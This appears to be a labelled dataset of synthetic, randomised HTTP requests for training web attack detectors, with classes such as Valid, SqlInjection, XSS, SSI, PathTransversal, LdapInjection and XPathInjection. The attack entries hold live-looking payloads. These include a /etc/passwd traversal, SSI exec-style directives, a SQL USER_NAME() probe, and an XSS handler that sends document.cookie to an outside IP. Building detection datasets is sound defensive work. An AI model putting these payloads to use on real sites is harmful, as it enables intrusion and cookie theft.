~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 24372
Start - Id: 372
class: Valid
GET /4RSeu4@@K1JteHgh7Tmo/yooKh/iitisa/x1tmtnnusso/n8D6y9AooFpdx_D/r2CtYQOxPu_7O8A/fcrridsuhdflifahlots/ctP/npCPBcFUDP/rdelaltr.jsp? HTTP/1.0
Host: www.weyet.uk
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-icelandic;q=0.1, iso-8859-8;q=0.2, windows-1258;q=0.6
Accept-Encoding: 
Accept-Language: o-mT8odop, y-Ymahg;q=0.5, isne8wTt-n, w-3ilsM, Gh-lEa;q=0.8
Cache-Control: no-store
Client-ip: 197.140.152.87
Cookie: RW76qLE9=05213;elink_JcW.8bTLR=aRFiIvuwYAjP;between1s-ynI8yd@=0316;6xdejeoEDene=;>cd2tmponosamo4s
Cookie2: $Version="75"
Date: Sat, 17 Oct 09 12:17:14 UTC
ETag: W/"2Pq8T8ga_S2sV.35gdCv"
Expect: caxlro
From: 7osi@ddydoOhs.net
If-Modified-Since: Mon, 04 Apr 05 06:06:56 GMT
If-Unmodified-Since: Thu, 16 Nov 06 12:20:05 UTC
If-Match: "pBXzMeFi9ZJ8-w-f4hG"
If-None-Match: "N@bTnUGkWboYrWk0"
If-Range: "YO2abdhF4cFZz-za"
Max-Forwards: 94
MIME-Version: 0.4
Pragma: no-cache
Proxy-Authorization: esre 0kxdroo3=3ikoD
Authorization: NTLM bmRzbW9wc2VldG9oYWdUZG9JZUhob2V0b2hxd3NhcGNkQTJkck9laXRlckVsVWw=
Range: 60-95,-13,615-290
Referer: http://1ird.ch/ei4hhfgi/ma4f/rbrb/oTacen/tHd2.gz
TE: gzip,trailers
Trailer: Connection
User-Agent: Mozilla/0.6 (Machintosh; U; PPC 1.5; aa-nz; rv:6.1.4) Gecko/56433378
UA-CPU: StrongARM
UA-Disp: 4410,166,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 0397x2303
Via: lIeeis/6.5 108.190.89.138, nkas9e/7.5 www.it2iwu.jpeg, HTTP/1.3 www.eythn8ld.gif:21127
Transfer-Encoding: fmoo4e; Lnya7yeU=pteeumv
Upgrade: sc3s/5.1, dtoP7n/7.1, ndxl/8.8
Warning: 019 www.rqism.png "eeerrEetourerTuu" 
X-Forwarded-For: 16.205.89.126
X-Serial-Number: 8963689877727
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 372
Start - Id: 23448
class: Valid
GET /70EWxZQd@tljv4z/GmiIs/I43IHT@hYpg/wbtQkVQMEUAPYG/ewMj62grh81pg8Ts/zg3slnnPlNscorer/zCH/Qto2/niS@IC9DTDPa..R.nsf?ukyrol1=upRvl&sepsghtolotoE=iplobsrei&stdinj1V=67779187&ibe1wnpGoAn=iJ2p&ebevacewsC0ro=321&ra=5Cmheoidhya&taoiqwesrqiea=MheehniEPoaz&etade=14330734&.p5yY-form=z4zSBsDJF8&2f1tm2Srmo=e2Oianqeo%29y&sonoTe=hEsb&eidJEr=615758&ontiBke7s=TsUi3alit3 HTTP/1.0
Host: www.oin4oh3k.net:80
Connection: so67ae
Accept: audio/*
Accept-Charset: x-mac-japanese;q=0.2, iso-8859-1
Accept-Encoding: *
Accept-Language: *;q=0.5
Cache-Control: OwuoT='iu6tzg'
Client-ip: 57.195.113.84
Cookie: tz6tidge7n7=leF5ZWcyQ;8p6wgetK.g1T=%dropet5ogl;ioin=eaow1htC
Cookie2: $Version="773"
Date: Tue, 04 Jan 05 15:18:28 CET
ETag: W/"wi37KR_mGFB84.svA"
Expect: 100-continue
From: tocfie@tta6.cz
If-Modified-Since: Thu, 06 Jul 06 20:11:40 UTC
If-Unmodified-Since: Sun, 27 Mar 05 04:25:48 CET
If-Match: "g3nHV37mR0@0.3rw4"
If-None-Match: *
If-Range: "NNeYKgH6hSLSTPXNa-R"
Max-Forwards: 276
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: Digest username="eru4bt"
Authorization: Basic UmxFNjpjeGxzNXl0
Range: 60-4,2-51827,267858-0573
Referer: http://www.iseAy.com/3rAha/1vht5hy/ltbe/huNhtn/ataltt.asmx
TE: gzip,deflate;q=0.4,gzip;q=0.9
Trailer: Range
User-Agent: Ttsse (phJSWQ; cpuXe-Yv; ykw8XFYsM; eZKYFgcm3w)
UA-CPU: StrongARM
UA-Disp: 2035,3360,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 8587x9946
Via: HTTP/6.9 199.197.115.69, FTP/1.0 www.2eesd6i.css:745
Transfer-Encoding: identity
Upgrade: umbaNi/0.8, Zb7fA/8.4
Warning: 514 www.icma.htm "hi7rt2ysVtuMd6rAei" 
X-Forwarded-For: 46.39.164.236
X-Serial-Number: 15233843
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23448
Start - Id: 39117
class: LdapInjection
POST /lEeeet0CsagoobyxearE/yrnsiffsd9reroh/hH2bGq4brGemJpNY8/4ssteegcyoo.tiff? HTTP/1.1
Content-Length: 114
Content-Language: itEia,apeg9ia,ar
Content-Encoding: deflate
Content-Location: http://www.nhftspo.com/mzetm.msf
Content-MD5: cmRyYW9pajFFcnVuaHdhZA==
Content-Type: application/x-www-form-urlencoded
Last-Modified: Thu, 18 Sep 08 05:27:54 UTC
Host: www.fEttixumoi.de
Connection: close
Accept: text/plain;q=0.8, application/postscript, application/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: 6Wis-otnchse
Cache-Control: only-if-cached
Cookie: etvh=ne)(&(objectClass =  gf9l*)
Date: Sat, 14 Jun 08 09:09:57 GMT
ETag: W/"cJPa-RFuW0MAFd7S1OI4"
If-Modified-Since: Mon, 27 Jul 09 22:10:12 GMT
If-Match: *
If-None-Match: *
Max-Forwards: 10
Pragma: no-cache
Proxy-Authorization: epumy akciE=cfo51o
Authorization: Basic MWhvZ291cmg6bWlhbA==
Range: 85066-
Referer: http://www.eannw.be/rpoxwtte/ei5dnv.asmx
TE: trailers,deflate
Trailer: Host
User-Agent: Mozilla/2.3 (X11; U; Linux i386 6.0; jd-yb; rv:5.7.5) Gecko/87797052
UA-Disp: 917,4219,32
UA-Color: color16
Via: 5.3 www.sONqt.js, FTP/3.2 26.26.92.92
Transfer-Encoding: gzip
Warning: 676 148.148.45.189 "3fhroMseset" "Wed, 28 Apr 04 09:47:59 GMT"
X-Serial-Number: 70645330174185
----: --------------------------

lh1rI=446&LXE7g9QbsWI=0910886432&leasLpun=rY7&81EDu3iU=l59sajdropnncecmdtn &Xptfarrahaaean=9041987&6do=s-1juOQCFU4

End - Id: 39117
Start - Id: 40892
class: SSI
GET /mQYbVtS/l.d80/rkosp/rF.uIkZj_6.ecg/smfMig0U1QR0.Gl9u/EywwSQozTYMU06/chanhezdgiWrwSNizhxi/rd/raJ06I3/cTwr04dX0.TcnGVFzvS/hz9Om-qLmNysG4N/naHtRs7ehaa.shtml?gsp=2%24e&3cUcat4q@JyL=soo&Hhsui=%3C%21--%23odbc++++connect%3D%22ete%2CaaOtf0%2CAJit%22++++++statement%3D%22select+*++from+++++t%22--%3E&X_6objectAX51tsD=msrshexaqoeo9ftpF&t4a=%5B%28ne&uwae1gdmeIps=3eos&fhomeLcopyq4gkVD=hipwtseepG&sf=rry&d1ocviageoSh=wHphpiblsa%3C%3Feyncrta&ytntd8t=s4TyZxn4&sonai1ssEEcsb=nt&okzE=0eAcisAof&dtai88hrl8wtue=orcp HTTP/1.0
Host: 92.77.123.95:0
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: shift_jis;q=0.9
Accept-Encoding: 
Accept-Language: *;q=0.2
Cache-Control: no-store
Client-ip: 74.22.128.43
Cookie: D4hhnna6tgx=4076658244;xclohtoaafs=passwd ;1snnTien3rcH0=f0lK3Y;ctanrste6box=84989;z3tCnwise=emafauu;eireOUsO4ed=sock_streamroe
Cookie2: $Version="39"
Date: Wed, 05 Jan 05 24:16:03 CET
ETag: "PJL9B8l1.1S_wd_"
Expect: 100-continue
From: 2cEq@o7ggnio.cz
If-Modified-Since: Fri, 07 Aug 09 04:00:05 GMT
If-Unmodified-Since: Thu, 21 Aug 08 02:38:54 CET
If-Match: "vC@jK_AsRqUWiO7h"
If-None-Match: *
If-Range: "PZkeTTUinjclUqHyzJ1"
Max-Forwards: 296
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: tltUu nost2=n6rl5
Range: 453-748
Referer: /hiLe/bC06/tNwteeg/stnncmc/lieao.dll
TE: deflate
Trailer: If-Unmodified-Since
User-Agent: urprmeurf/7.2.8.5.2
UA-CPU: x86
UA-Disp: 8926,1457,32
UA-OS: Win95
UA-Color: color16
UA-Pixels: 5993x410
Via: HTTP/1.2 75.45.88.71
Transfer-Encoding: deflate
Upgrade: r9csst/5.6, el9/0.6, zraee/3.2
Warning: 922 120.154.3.236 "qaolcnn7" 
X-Forwarded-For: 38.3.235.137
X-Serial-Number: 1967556980
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40892
Start - Id: 36357
class: PathTransversal
GET /qEGyCVN5p/pd/es/0srFTehTr0EEur/zbJk9/h_aJkpTTMdggts5P/roycdmvrnjmotb7/n9_l7cTwMYadU9bJpeNw/snrmee4raan/iCuxgwqqDHJL1kW5.jpg?nErnenueNiaI=pied-nhwlSoet&j1i.R=gsst%2FimgIeOetNahn%3C&IoBpwy9is=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&8Cha=635&rre=aw2&eh4o=a&o8iCi3s=2&si1ujATr=91&beuahoool2=mm%27As%28wen9-%3Aascript&azAnie=+%26%25%5B HTTP/1.0
Host: 3.171.145.253:32
Connection: othaisw
Accept: */*;q=0.5
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-transform
Client-ip: 150.79.127.140
Cookie: 6tfjaC=t8lcsn1xeesutns
Cookie2: $Version="14"
Date: Wed, 07 Sep 05 13:59:19 CET
ETag: W/"FVdxZvFAz4j68bNZ95W0"
Expect: eatl
From: sotSFlSe@qiksat.biz
If-Modified-Since: Fri, 08 Jan 10 02:03:48 UTC
If-Unmodified-Since: Sun, 02 Mar 08 05:20:53 GMT
If-Match: *
If-None-Match: *
If-Range: "cB1oQ@yo3ygkubrCeISc"
Max-Forwards: 3
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Basic YXVJbnM6ZWhpcjFndHU=
Authorization: NTLM ZXRhdG5iMWVUaWttbW9hQXVlZ3diYTBuZ3hhZXlnbmdub3Q=
Range: 75-618834,757-411,77394-267269
Referer: http://i5hoaiL.net/97ly/e35Iiin.zip
TE: gzip
Trailer: From
User-Agent: Mozilla/8.6 (X11; U; Linux i386 7.6; be-eh; rv:4.2.6) Gecko/17358483
UA-CPU: MIPS
UA-Disp: 7628,9010,16
UA-OS: Win9x
UA-Color: color8
UA-Pixels: 636x8824
Via: HTTP/9.8 www.xjod6ef5.gif:0461
Transfer-Encoding: gzip
Upgrade: T8m/5.2, fg1ie/5.0, hrhh/0.4
Warning: 752 195.16.67.206 "ehmsasmiiyniOokn" 
X-Forwarded-For: 217.52.49.74
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36357
Start - Id: 46771
class: XSS
POST /aaseorwhAtnol0slewho/eq3eAOTn@WHNb2Rz1gGr/2PqpNK72M1ygsll0/e.RyZfK/LIt.jpeg? HTTP/1.1
Content-Length: 198
Content-Language: kl1btOix
Content-Encoding: identity
Content-Location: http://Lieioet.net/exresee/nntwtr/T6ofou/oBpbNil/Resdai.gif
Content-MD5: bmF0ZW5yZTZyaTZpRGF3RA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 19 Dec 08 15:55:08 GMT
Last-Modified: Sun, 03 May 09 22:25:28 CET
Host: 41.215.81.172
Connection: keep-alive
Accept: audio/*;q=0.9, image/*, video/*;q=0.8
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: raXi-haereyp, 9osdE-vioe;q=0.6, ueabt-gitrVe4o;q=0.7, r3narH-leylse;q=0.8
Cache-Control: min-fresh=0
Client-ip: 19.200.37.172
Cookie: ielSyYRCseeeal=ropt
Cookie2: $Version="208"
Date: Sat, 25 Oct 08 08:00:22 UTC
ETag: W/"MM.EeJLmJi95MwtL.Hfd"
Expect: feazi6
From: dyenT@gpt6glsG.cz
If-Modified-Since: Thu, 22 May 08 06:18:58 UTC
If-Unmodified-Since: Thu, 08 Dec 05 08:17:29 UTC
If-Match: *
If-None-Match: *
If-Range: "iDGLXhjkjg.ZIa96k"
Max-Forwards: 5
MIME-Version: 7.2
Pragma: lilA=orelE4Tr
Proxy-Authorization: o1svi Elj40=bhoesO1
Authorization: Digest uri=/aL4oa3dk/aIef.tar
Range: 462-
Referer: http://www.7rnida.ch/OTrh/epantQh/oestu/Td9atbar/oneIoMT.jpeg
TE: chunked,trailers,trailers
User-Agent: XiAnaxeir8aE
UA-Color: color32
UA-Pixels: 1199x1516
Via: FTP/2.3 www.Edityfik.js, Ar9s/1.7 90.180.35.219, 7.8 www.a4Ieoorn.jpg
Transfer-Encoding: compress
Warning: 061 205.79.84.252 "trdaeY" "Tue, 09 Nov 04 20:27:34 CET"
X-Forwarded-For: 183.74.153.68
X-Serial-Number: 4765773
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

qhetmere9dh=wsatd1seey&sM03aqkOsSdtl=e3R&sl=uqtat&h5=49875073&Q2R7=<div   onmouseover = "    [window.open('http://90.208.197.84/tamang.swf'+document.cookie);]   " >

End - Id: 46771
Start - Id: 33125
class: Valid
PUT /oc3Ehm/itVB/at5iro.php4? HTTP/1.1
Content-Length: 239
Content-Language: asaiiest
Content-Encoding: compress
Content-Location: http://ntsh0tS.st/nxAsi/eige5arj/eauylDaE/uau8.tiff
Content-MD5: bDVOb3dzaXJvSGZUdGVocg==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 29 Jan 08 10:27:56 GMT
Last-Modified: Sat, 05 May 07 08:17:47 CET
Host: www.eoasr7eot.gov:80
Connection: close
Accept: video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: S2trt-o0h;q=0.1, 4h2K-a9, e-s, i-6ta;q=0.2, if-ya8eaoi;q=0.5
Cache-Control: max-age=269
Client-ip: 230.124.221.154
Cookie: elArxp=8330;46=ht;la53motwodl4=node;tmjnten=seKqqa;ts4k=9688212
Cookie2: $Version="0"
Date: Sat, 29 Mar 08 10:54:05 GMT
ETag: "FuhKu4sJi4zJ5TTZcB@"
Expect: eyssad
From: seG3efo4@sotpd5rbb.com
If-Modified-Since: Sat, 09 Oct 04 06:40:33 GMT
If-Unmodified-Since: Mon, 28 Aug 06 14:37:18 GMT
If-Match: "Szvqlo@ZYsqKHiUjaVQA"
If-None-Match: *
If-Range: Tue, 29 Aug 06 08:16:15 GMT
Max-Forwards: 80
MIME-Version: 2.0
Pragma: o=yne
Proxy-Authorization: Basic N3RhN3JuOnVkbW5zZA==
Authorization: Digest opaque="d3Nact"
Range: -787,80891-464,53849-
Referer: /rdpnin/ttlrwrna/0hax/eaipui/rrPenht.wmn
TE: chunked;q=0.9,trailers
Trailer: User-Agent
User-Agent: Mozilla/8.7 (X11; U; Linux i586 3.5; sy-ut; rv:9.9.2) Gecko/74272045
UA-CPU: MIPS
UA-Disp: 035,199,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 6581x441
Via: 6.0 www.bnctcom.gif, 6.4 www.ha6ep.gif
Transfer-Encoding: gzip
Upgrade: i1oE/1.8, htoee/2.9, lnsedh/9.7, rNtlnM/5.3
Warning: 903 www.rzea4yr.htm "r5iGesaOlmea2osamrqa" "Tue, 10 Feb 04 12:04:44 GMT"
X-Forwarded-For: 221.12.252.224
X-Serial-Number: 0421946796861302632
----: -----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ttge=@gqe8window.openeval4n&rdlgnqahovzoj=650&S-3C_=dPX2Io&go0eno=hiframetcfh&bf2TY4E=mt&&e6eerlms3n=mutf7<zr&@ye p4mti6&zeqFAsGTy=39&jdobroe=aobjecte1o&CQOaH9NcrxY=cmdgsloorl1'$n&-IXNNI4=H\ pD&niae=869292881&cu84n8=?ceip

End - Id: 33125
Start - Id: 16156
class: Valid
GET /aoroDDaLD9ANQ7.sh?5catyxe=sst3asij9oeF+t%3B1n0p&kdhn5osrfb=lTehnn&eh8ort6sas=nleaptytawd&hslh=rgR&rs1=3&Ssco3O@HIY=rfWbdo&cmhle9catNel=rx8f3y&.W4b=sFIQGJ9bK&aDnulloRzjF=canamrs&Cmtratols=erYvKJjm-v%40 HTTP/1.1
Host: www.haia.uk:80
Connection: keep-alive
Accept: text/*;q=0.8
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: rbcSbi-ceetLt;q=0.6, sk-4ien, Looebhgh-Exeeemtk, dyeuIsrs-5tk, eR-gRu0yNe
Cache-Control: hndankn='d6hoow'
Client-ip: 163.65.92.102
Cookie: 4as=Ta ut;hecstrer=\d7yee;enxactrctCS=H~ihi;hoTrekltte7Lg=sapsuorMud;hpe=796;d6inl4ei=638533
Cookie2: $Version="737"
Date: Wed, 08 Oct 08 18:54:56 CET
ETag: W/"5GqYSV1L-MHzvD_"
Expect: dasaoNn
From: nt6y@jrn3wp.st
If-Modified-Since: Fri, 13 Jul 07 11:26:59 CET
If-Unmodified-Since: Thu, 27 May 04 03:02:42 GMT
If-Match: *
If-None-Match: "Z-a2A1Ed3sxNEWy"
If-Range: "2kyHdvUh8coht33"
Max-Forwards: 8253
MIME-Version: 0.7
Pragma: n2mtialf='q'
Proxy-Authorization: Digest uri=http://cU5vaEqM.net/bddo2k.exe
Authorization: Digest opaque="su0ee"
Range: -6,88514-
Referer: /stdT/lnEdsal/toYeo/aymeb.gz
TE: gzip;q=0.9,trailers,trailers
Trailer: Referer
User-Agent: e8oyI3r
UA-CPU: MIPS
UA-Disp: 1227,627,16
UA-OS: Windows NT
UA-Color: color16
UA-Pixels: 846x8936
Via: HTTP/5.0 49.180.186.178, 9.5 www.torzma.htm, HTTP/9.5 www.et8esD.js
Transfer-Encoding: hwhhba; hrpo9=watnuz
Upgrade: c7s/6.3, sdds/1.7, hGed/6.3, sda/9.3
Warning: 974 167.121.41.130 "gczrblTleio" 
X-Forwarded-For: 137.131.109.193
X-Serial-Number: 170443509058668191
----: ---------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 16156
Start - Id: 39436
class: SSI
GET /hsm/VscriptQM3Ef/lrwc1t8leaA/ouEHX8BZ-.6GwEOm@.4/njl2XZ4Es/eQ@R/32Buirle61J0TkIa.exe?BnpR=59738184&coireeewors=4qekYyc8G&_z35rV=m8mdaxhs4isSsilt&mdcer2=%3C%21--%23echo+var%3D%22date_gmt%22--%3E HTTP/1.1
Host: www.rihhnlh3.org
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: koi8;q=0.4, windows-1254, windows-1257;q=0.0, shift_jis, x-mac-chinesesimp;q=0.4
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-age=5
Client-ip: 69.64.197.144
Cookie: ksZLQo@L0Z7=4e+ie'eeifguilinput4Som;idrdeCp=i;Yitgmhzo=06791502
Cookie2: $Version="308"
Date: Thu, 23 Oct 08 20:10:18 GMT
ETag: "-A3q_0z5h0Y@AJr8"
Expect: 100-continue
From: hziane@Cydgndnsy.org
If-Modified-Since: Thu, 06 Dec 07 10:11:44 CET
If-Unmodified-Since: Sun, 20 Nov 05 16:43:22 UTC
If-Match: *
If-None-Match: "B1F2-8jSm9IP8.gHa"
If-Range: Tue, 27 Mar 07 04:14:38 UTC
Max-Forwards: 8
MIME-Version: 3.5
Pragma: ht=hOmppd
Proxy-Authorization: rashN riiam=cssstki
Authorization: Digest username="oejorh"
Range: -07524
Referer: /neeEC/eera/eoflaeot/u3esrr/ie1iEi.conf
TE: gzip;q=0.6,chunked,trailers
Trailer: Authorization
User-Agent: thlinRnsrihu
UA-CPU: PowerPC
UA-Disp: 9324,2062,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 162x589
Via: eMrfj/9.9 57.38.110.68:8462
Transfer-Encoding: gzip
Upgrade: r94e/0.1, hme/5.5, ammrcS/1.0, aznO/2.8
Warning: 280 113.181.5.189:613 "neo5iip" "Wed, 20 Feb 08 05:16:28 CET"
X-Serial-Number: 7022355683967600
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39436
Start - Id: 48953
class: XPathInjection
GET /40d.-8Hf2Lpt_byJxj/Ans/sBSRs/hhfWei7fonaterkry/tdtnhd1hNvSsgi/iarmvmyrfERsnosse/ilTEnh/aF5DWzTfvPxZ5rW_/s9UuHL/6rRPvKUJBQQtHf3_-lGS.bin?6Wmt29_Q=mu4hiudvSu&asrne=rSa&tlntseauCnisd=4527199978&kttysngknwr2ijc=%28i+%3C++++count%28Tiile%2Fchild%3A%3Atext%28%29%29+and+++j+++%3C+++count%28i6eehe%2Fchild%3A%3Acomment%28%29%29+++++and+++k++++%3C+++++count%28hnalEi%2Fchild%3A%3A*%29++%29&itjdaeddylmnxs=iz4nlh1niz%29l&5pUz=ymroiE11sed&ebdfEiva2t4lsko=178&nwntrJNcrusnEih=9428493 HTTP/1.0
Host: www.tj2re.uk
Connection: neeaibs
Accept: audio/x-wav
Accept-Charset: windows-1258, euc-jp;q=0.8, big5, iso-8859-1, gb2312;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: max-age=22
Client-ip: 143.194.93.206
Cookie: tdOa8iajweD8h=yIUZq;aeei9u8ltr=dsataktp6m;oftq6Rtwdee=73
Cookie2: $Version="818"
Date: Sun, 02 May 04 01:39:00 UTC
ETag: "67zNZJfrU4MFuOKI2v"
Expect: 100-continue
From: ietdnl@1aln.fr
If-Modified-Since: Fri, 27 Apr 07 16:30:38 GMT
If-Unmodified-Since: Thu, 06 Aug 09 17:35:08 GMT
If-Match: *
If-None-Match: "2VzXCwtDhMwVchTT4O"
If-Range: Sat, 03 Jul 04 20:09:58 GMT
Max-Forwards: 68
MIME-Version: 3.9
Pragma: no-cache
Proxy-Authorization: 7ryrer l7Fsei=9ums
Authorization: vtaa iiuEo=syio
Range: 5-
Referer: /toogp/xeTisHn/nEhtr/iSeaegfe.dll
TE: trailers,trailers,trailers
Trailer: User-Agent
User-Agent: 7euuns (hktYVP; tfo9ujD.JD; pV8qKYJe7; erwPBtC-sz)
UA-CPU: 68000
UA-Disp: 3657,5420,8
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 2276x9830
Via: ucrr/4.9 101.74.86.235, lyboeh/8.3 191.98.21.84, 9.1 www.oo2S.gif
Transfer-Encoding: compress
Upgrade: 6kse/1.8, ssz/9.9, tathn/5.4
Warning: 219 www.NUeeo.shtml "r8tNtaTA" 
X-Forwarded-For: 238.131.71.180
X-Serial-Number: 544350626543951868
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48953
Start - Id: 28327
class: Valid
GET /2kM5XeeJzdYdZh8fUz/0-UaS6/Seqo6HeheaiAear1/phDx2o/lXUj/8updateb@.jpeg? HTTP/1.0
Host: www.stnOaek.biz
Connection: keep-alive
Accept: image/*;q=0.0
Accept-Charset: *;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-store
Client-ip: 33.66.117.12
Cookie: reteattscuosrE=~sexecsjln;boDnxedca=rG3ut;fNe=inte;A0MFlhg.n=ae
Cookie2: $Version="30"
Date: Fri, 13 Mar 09 03:10:55 GMT
ETag: "ZHjzcsvv9oiOagW"
Expect: 100-continue
From: uo4ee7@tp9n.net
If-Modified-Since: Fri, 21 Apr 06 03:38:23 GMT
If-Unmodified-Since: Sun, 05 Dec 04 05:20:02 GMT
If-Match: *
If-None-Match: *
If-Range: Mon, 27 Mar 06 23:35:55 CET
Max-Forwards: 93
MIME-Version: 9.3
Pragma: nlnqhew3=ab
Proxy-Authorization: Digest cnonce="pniifin"
Authorization: Basic aXNsb2FhdzpFejZoZWFoNg==
Range: 1084-,9187-,-3
Referer: http://www.rtmPonnr.org/iTeoa/diwjhXlc/9sxitsc/psk6rv.sh
TE: gzip;q=0.4,deflate;q=0.2
Trailer: Max-Forwards
User-Agent: Mozilla/4.8 (compatible; ascb; Windows NT; ratL)
UA-CPU: StrongARM
UA-Disp: 5474,653,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 680x9650
Via: HTTP/0.5 www.irasIe.js
Transfer-Encoding: gzip
Upgrade: mNe/8.8, ehIbla/4.3, s6oaa/4.9, cih/1.0
Warning: 182 210.237.2.83 "1aio4ulskr" 
X-Forwarded-For: 146.40.109.99
X-Serial-Number: 4245119888
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 28327
Start - Id: 23655
class: Valid
GET /Rconnect/ahNuAtYyd1.css?WAlhnt8g=drvrs+&43EIVUOxmlDqC=iVm5lZamOW&se8sioeneEbues=oJly&_SperlsTUWPmW=eropNt9mtg&efotp=a4aueierehqcr&eeevyeaoiineeh=53904&edeq=%2B9cn&9GYgjWjyhZcC=i%28jinl&paeatiu7gmleue=nCwf-uuBi&baJkgo=mUT%40ILdaY&lb6sam.1UHuN8=63131&ta7l7cseXEwt=qcechoheoht%25n&hnrlewSxkl=2mTapTG&Bt7los2=6boot.ini HTTP/1.0
Host: www.Ttemrs.org:883
Connection: fcodkyn
Accept: audio/x-wav;q=0.2, audio/*
Accept-Charset: *
Accept-Encoding: identity;q=0.6
Accept-Language: *;q=0.6
Cache-Control: no-store
Client-ip: 131.237.149.176
Cookie: WbLBI3ifupdatePZ=rS1H4dDR;dtol=3317870470;rOed7EashshNs=655
Cookie2: $Version="58"
Date: Sun, 08 Feb 09 10:57:11 GMT
ETag: W/"hJnbxoEublZENg7E"
Expect: m9iE5=hine
From: sdRsrbm@8Ksyhxnv6C.uk
If-Modified-Since: Tue, 13 Mar 07 10:06:53 CET
If-Unmodified-Since: Wed, 07 Apr 04 13:19:25 GMT
If-Match: "8HbkwbvAQm_NFiCy"
If-None-Match: "ETqDF6zdnQeeiXCeg"
If-Range: Tue, 13 Jun 06 19:19:42 CET
Max-Forwards: 7667
MIME-Version: 6.8
Pragma: eR8ob=lc6drn
Proxy-Authorization: Basic ZGFhaGJsOmh0MmRk
Authorization: eslIsl h9i8aIzj=isg9
Range: 40253-8,-5,08143-143
Referer: /liPstE.tar
TE: deflate;q=0.3
Trailer: Accept-Language
User-Agent: Mozilla/6.8 (Machintosh; U; Mac OS X 3.5; qw-nh; rv:4.0.7) Gecko/23335155
UA-CPU: 68000
UA-Disp: 488,135,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 361x375
Via: HTTP/0.6 www.ut3eLdfe.css, 2.9 www.eptqTUw.gif
Transfer-Encoding: deflate
Upgrade: s6yoe/1.1, teu/4.0, qs88/7.4, ngfbts/8.4
Warning: 106 www.otao9u.png "uedtUhed0asbe" "Sun, 20 May 07 15:25:06 CET"
X-Forwarded-For: 102.8.0.254
X-Serial-Number: 13224
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 23655
Start - Id: 41361
class: SqlInjection
PUT /rlatr88b/3tbonfmarp7esngMet.mdb? HTTP/1.1
Content-Length: 103
Content-Language: vedntsec,4rEd,Y
Content-Encoding: identity
Content-Location: /giauFpe/rett/Aecceyr/dam44ep.mdb
Content-MD5: U29zNWNucmRodmRFZ2xlcg==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 30 Nov 05 04:27:48 CET
Last-Modified: Sat, 19 Apr 08 02:17:11 GMT
Host: 61.135.216.91:80
Connection: keep-alive
Accept: image/gif, audio/basic, video/*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.3
Cache-Control: no-store
Client-ip: 200.4.215.226
Cookie: nsndfebcapi=01517941;RQI.=nhicognnsa
Cookie2: $Version="6"
Date: Thu, 20 Aug 09 20:14:48 CET
ETag: "WL2SRiTGa6PzdsbIoDL"
Expect: 100-continue
If-Modified-Since: Sun, 05 Sep 04 23:00:03 CET
If-Unmodified-Since: Wed, 14 Sep 05 21:24:23 CET
If-Match: "SWFru0JFVzrFD92"
If-None-Match: *
If-Range: "RNv@t1doaOCA6mlkV4U"
Max-Forwards: 8818
MIME-Version: 3.6
Pragma: aEPlo='or'
Proxy-Authorization: abryl sncnwry=mz4brhd
Authorization: Basic eHNPbHM6c3JkY0U=
Referer: http://www.satgo.com/9wou/axtomioe/stsg7er/7Fle.css
TE: trailers
User-Agent: Mozilla/0.0 (compatible; MSIE 8.0; Linux i586; t5gjt; eyunact)
UA-Disp: 557,1073,8
UA-OS: Windows 98
Via: FTP/6.9 www.dhxTd.js, HTTP/6.5 246.2.104.227, FTP/5.5 www.seat7ec.css
Transfer-Encoding: gzip
Upgrade: nhetgd/3.9
Warning: 522 63.253.58.196 "esHrot6irna" 
X-Serial-Number: 309660
----: ------------------------------------

tjaoenigeielo=sj1elib? )eurscz a0h&gnoeemtnp=eeg5dul7TK1&ngcirs=' AND  USER_NAME()='sahm6

End - Id: 41361
